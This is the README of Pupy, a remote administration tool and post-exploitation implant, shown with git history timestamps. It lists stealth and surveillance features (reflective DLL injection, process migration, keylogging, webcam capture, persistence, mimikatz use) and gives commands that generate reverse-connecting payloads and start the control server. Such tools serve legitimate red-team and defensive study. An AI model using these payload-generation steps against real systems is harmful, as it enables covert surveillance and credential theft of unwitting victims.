pupy/README.md

247 lines
10 KiB
Markdown
Raw Normal View History

2015-09-21 20:24:27 +00:00
# Pupy
2015-10-30 22:46:40 +00:00
Pupy is an opensource, multi-platform Remote Administration Tool with an embedded Python interpreter, allowing its modules to load python packages from memory and transparently access remote python objects. Pupy can communicate using different transports and have a bunch of cool features & modules. On Windows, Pupy uses reflective dll injection and leaves no traces on disk.
2015-09-21 20:15:05 +00:00
## Features
2015-09-21 20:15:05 +00:00
- On windows, the Pupy payload is compiled as a reflective DLL and the whole python interpreter is loaded from memory. Pupy does not touch the disk :)
- Pupy can reflectively migrate into other processes
- Pupy can remotely import, from memory, pure python packages (.py, .pyc) and compiled python C extensions (.pyd). The imported python modules do not touch the disk. (.pyd mem import currently work on Windows only, .so memory import is not implemented)
- Modules are quite simple to write and pupy is easily extensible
- A lot of awesome modules are already implemented!
- Pupy uses [rpyc](https://github.com/tomerfiliba/rpyc) and a module can directly access python objects on the remote client
- We can also access remote objects interactively from the pupy shell and you even get auto-completion of remote attributes!
2015-10-30 22:34:08 +00:00
- Communication transports are modular and pupy can communicate using obfsproxy [pluggable transports](https://www.torproject.org/docs/pluggable-transports.html.en)
- All the non interactive modules can be dispatched to multiple hosts in one command
2015-10-30 22:34:08 +00:00
- Multi-platform (tested on windows 7, windows xp, kali linux, ubuntu, osx)
- Modules can be executed as background jobs and their output be retrieved later
- Commands and scripts running on remote hosts are interruptible
- Auto-completion for commands and arguments
- Nice colored output :-)
- Command aliases can be defined in the config
2015-10-30 22:20:37 +00:00
## Implemented Transports
2015-10-30 22:20:37 +00:00
- tcp_cleartext
- A good example to look at, it's a protocol that does nothing
- tcp_base64
- Another simple example
2015-10-30 22:20:37 +00:00
- tcp_ssl (the default one)
- obfs3
- [A protocol to keep a third party from telling what protocol is in use based on message contents](https://gitweb.torproject.org/pluggable-transports/obfsproxy.git/tree/doc/obfs3/obfs3-protocol-spec.txt)
- scramblesuit
- [A Polymorphic Network Protocol to Circumvent Censorship](http://www.cs.kau.se/philwint/scramblesuit/)
2015-09-21 20:15:05 +00:00
## Implemented Launchers
Launchers allow pupy to run custom actions before starting the reverse connection
- simple
- Just connect back
- auto_proxy
- Retrieve a list of possible SOCKS/HTTP proxies and try each one of them. Proxy retriaval methods are: registry, WPAD requests, gnome settings, HTTP_PROXY env variable
## Implemented Modules
2015-10-08 17:36:37 +00:00
- migrate
2015-09-21 20:15:05 +00:00
- inter process architecture injection also works (x86->x64 and x64->x86)
2015-10-30 22:05:36 +00:00
- command execution
- interactive shell (cmd.exe, /bin/sh, /bin/bash, ...)
- tty allocation is well supported on target running a unix system. Just looks like a ssh shell
- interactive python shell
- download
- upload
2015-10-08 17:36:37 +00:00
- persistence
- screenshot
- webcam snapshot
2015-10-30 22:34:08 +00:00
- ~~to spy on your crush~~
- in memory execution of PE exe both x86 and x64!
2015-10-30 22:05:36 +00:00
- works very well with [mimitakz](https://github.com/gentilkiwi/mimikatz) :-)
2015-09-21 20:15:05 +00:00
- socks5 proxy
- local port forwarding
2015-09-22 20:18:56 +00:00
- shellcode exec (thanks to @byt3bl33d3r)
2015-10-30 22:05:36 +00:00
- keylogger
- monitor keys and the titles of the windows the text is typed into, plus the clipboard! (thanks @golind for the updates)
2015-10-30 22:05:36 +00:00
- mouselogger:
- takes small screenshots around the mouse at each click and send them back to the server (thanks @golind)
2015-09-21 20:15:05 +00:00
##Quick start
###Installation
2015-10-11 16:08:30 +00:00
```bash
pip install rpyc
pip install pefile
2016-01-06 17:21:04 +00:00
pip install pycrypto
2015-10-11 16:08:30 +00:00
```
####Troubleshooting
2015-10-11 16:08:30 +00:00
If you have some issues with rpyc while running the server on windows, take a look at issue #25, @deathfantasy made a fix
2015-10-11 16:12:23 +00:00
### Generate/run a payload
In these examples the server is running on a linux host (tested on kali linux) and its IP address is 192.168.0.1
2015-09-21 20:15:05 +00:00
The clients have been tested on (Windows 7, Windows XP, kali linux, ubuntu, Mac OS X 10.10.5)
#### for Windows
```bash
$ ./pupygen.py auto_proxy -h
usage: auto_proxy [-h] --host <host:port>
[--transport {obfs3,tcp_cleartext,tcp_ssl,tcp_base64,scramblesuit}]
...
$ ./pupygen.py -t exe_x86 auto_proxy --transport tcp_ssl --host 192.168.2.132:443
binary generated with config :
OUTPUT_PATH = ~/pupy/pupyx86.exe
LAUNCHER = 'auto_proxy'
LAUNCHER_ARGS = ['--transport', 'tcp_ssl', '--host', '192.168.2.132:443']
OFFLINE_SCRIPT = None
2015-09-21 20:15:05 +00:00
```
you can also:
- use another launcher (currently simple or auto_proxy)
- use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means
2015-10-23 17:23:36 +00:00
- customize the transport used by supplying it with --transport
2015-10-11 16:08:30 +00:00
#### for Linux & Mac OS X
2015-09-21 20:15:05 +00:00
```bash
2016-01-06 17:21:04 +00:00
pip install rpyc #(or manually copy it if you are not admin)
pip install pycrypto
python pp.py simple --transport tcp_ssl --host 127.0.0.2:443
```
you can also:
- modify the default arguments at the top of the file to call pp.py without arguments
- build a single binary with pyinstaller:
```bash
2015-10-23 17:50:34 +00:00
pyinstaller --onefile /full_path/pupy/pupy/pp.py
```
2015-09-21 20:15:05 +00:00
2015-09-21 21:26:47 +00:00
### start the server
2015-09-21 20:15:05 +00:00
1. eventually edit pupy.conf to change the bind address / port
2015-10-23 17:23:36 +00:00
2. start the pupy server with the transport used by the client (tcp_ssl by default):
2015-09-21 20:15:05 +00:00
```bash
2015-10-23 17:23:36 +00:00
./pupysh.py --transport <transport_used>
2015-09-21 20:15:05 +00:00
```
2015-09-21 20:50:01 +00:00
### Some screenshots
#####list connected clients
![screenshot1](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr1.png "screenshot1")
#####help
![screenshot3](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/help.png "screenshot3")
#####execute python code on all clients
![screenshot2](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr2.png "screenshot2")
#####execute a command on all clients, exception is retrieved in case the command does not exists
![screenshot4](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/scr3.png "screenshot4")
#####use a filter to send a module only on selected clients
![screenshot5](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/filters.png "screenshot5")
#####migrate into another process
![screenshot6](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/migrate.png "screenshot6")
2015-09-21 21:12:18 +00:00
#####interactive shell
![screenshot7](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/interactive_shell.png "screenshot7")
#####interactive python shell
![screenshot8](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/pyshell.png "screenshot8")
2015-10-08 17:36:37 +00:00
#####upload and run another PE exe from memory
![screenshot9](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/memory_exec.png "screenshot9")
2015-10-08 17:55:55 +00:00
#####list available modules (the list is not up to date)
![screenshot10](https://github.com/n1nj4sec/pupy/raw/master/docs/screenshots/list_modules.png "screenshot10")
2015-09-21 20:50:01 +00:00
2015-09-30 20:40:45 +00:00
##Example: How to write a MsgBox module
First of all write the function/class you want to import on the remote client
2015-09-21 21:26:47 +00:00
in the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py
```python
import ctypes
import threading
def MessageBox(text, title):
t=threading.Thread(target=ctypes.windll.user32.MessageBoxA, args=(None, text, title, 0))
t.daemon=True
t.start()
```
then, simply create a module to load our package and call the function remotely
```python
class MsgBoxPopup(PupyModule):
""" Pop up a custom message box """
def init_argparse(self):
self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
self.arg_parser.add_argument('--title', help='msgbox title')
self.arg_parser.add_argument('text', help='text to print in the msgbox :)')
@windows_only
def is_compatible(self):
pass
def run(self, args):
self.client.load_package("pupwinutils.msgbox")
self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
self.log("message box popped !")
```
2015-10-11 16:14:20 +00:00
and that's it, we have a fully functional module :)
2015-10-11 16:08:30 +00:00
```bash
>> run msgbox -h
usage: msgbox [-h] [--title TITLE] text
Pop up a custom message box
positional arguments:
text text to print in the msgbox :)
optional arguments:
-h, --help show this help message and exit
--title TITLE msgbox title
```
2015-09-21 21:26:47 +00:00
2015-09-21 20:50:01 +00:00
## Dependencies
2015-10-11 16:12:23 +00:00
rpyc (https://github.com/tomerfiliba/rpyc)
2015-11-23 18:26:23 +00:00
pycrypto
pefile
yaml (only needed if using scramblesuit transport)
2015-09-21 20:50:01 +00:00
2015-09-21 21:12:18 +00:00
##Roadmap and ideas
Some ideas without any priority order
2015-10-30 22:20:37 +00:00
- [X] ~~make the PE memory execution works interactively~~
2015-10-30 22:05:36 +00:00
- [X] ~~handle tty in interactive shell~~
- [X] ~~exfiltration through obfsproxy obfuscated network stream?~~
2015-10-30 22:05:36 +00:00
- [X] ~~webcam snapshots~~
- [ ] bind payloads instead of reverse
2015-10-30 22:20:37 +00:00
- [ ] make the network transports stackable (for example to encapsulate SSL over scramblesuit)
2015-10-30 22:05:36 +00:00
- [ ] make the python compiled C extension load from memory on linux
- [ ] make the migrate modules works on linux
- [ ] add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
- [ ] integrate scapy in the windows dll :D (that would be fun)
- [ ] then make some network attack/sniffing tools modules using scapy
- [ ] work on stealthiness under unix systems
- [ ] mic recording
- [ ] socks5 udp support
- [ ] remote port forwarding
- [ ] add a wiki and write some documentation
- [ ] split the README into the wiki
- [ ] The backdoor factory?
- [ ] Impacket?
2016-01-06 17:21:04 +00:00
- [ ] add auto-completion to the pyshell module
- [X] support for https & socks proxy
2015-10-30 22:05:36 +00:00
- [ ] HTTP transport
- [ ] UDP transport
- [ ] DNS transport
- [ ] ICMP transport
2015-10-30 22:20:37 +00:00
- [ ] bypass UAC module
2015-10-30 22:05:36 +00:00
- [ ] privilege elevation module
2015-09-21 21:14:21 +00:00
- ...
- other cool ideas?
2015-09-21 21:12:18 +00:00
2015-10-08 17:36:37 +00:00
## FAQ
> Does the server work on windows?
2015-10-08 18:00:34 +00:00
2016-01-08 21:50:14 +00:00
Pupy server works best on linux. The server on windows has not been really tested and there is probably a lot of bugs. I try my best to code in a portable way but I don't always find the time to fix everything. If you find the courage to patch non-portable code, I will gladly accept pull requests! :)
2015-10-30 22:05:36 +00:00
2016-01-08 21:50:14 +00:00
> I can't install it, how does it work?
2015-10-08 18:00:34 +00:00
2016-01-08 21:50:14 +00:00
Use pip to install all the dependencies
2015-10-30 22:05:36 +00:00
2016-01-08 21:50:14 +00:00
> hey c4n y0u add a DDOS module plzz?
2015-10-08 18:00:34 +00:00
2015-10-08 17:36:37 +00:00
No.
2016-01-08 21:50:14 +00:00
> I was wondering if you had a BTC address I could send a tip over to
Sure, here you go :
Bitcoin address: 12BKKN81RodiG9vxJn34Me9ky19ArqNQxC
2015-10-08 17:36:37 +00:00
2015-09-21 20:50:01 +00:00
## Contact
2015-09-30 20:40:45 +00:00
by mail: contact@n1nj4.eu
on Twitter: [Follow me on twitter](https://twitter.com/n1nj4sec)
2016-01-08 21:50:14 +00:00
2015-10-13 21:01:39 +00:00
If some of you want to participate or send me a feedback, don't hesitate :-)
2016-01-08 21:50:14 +00:00
This project is a personal project, please respect its philosophy and don't use it for evil purposes!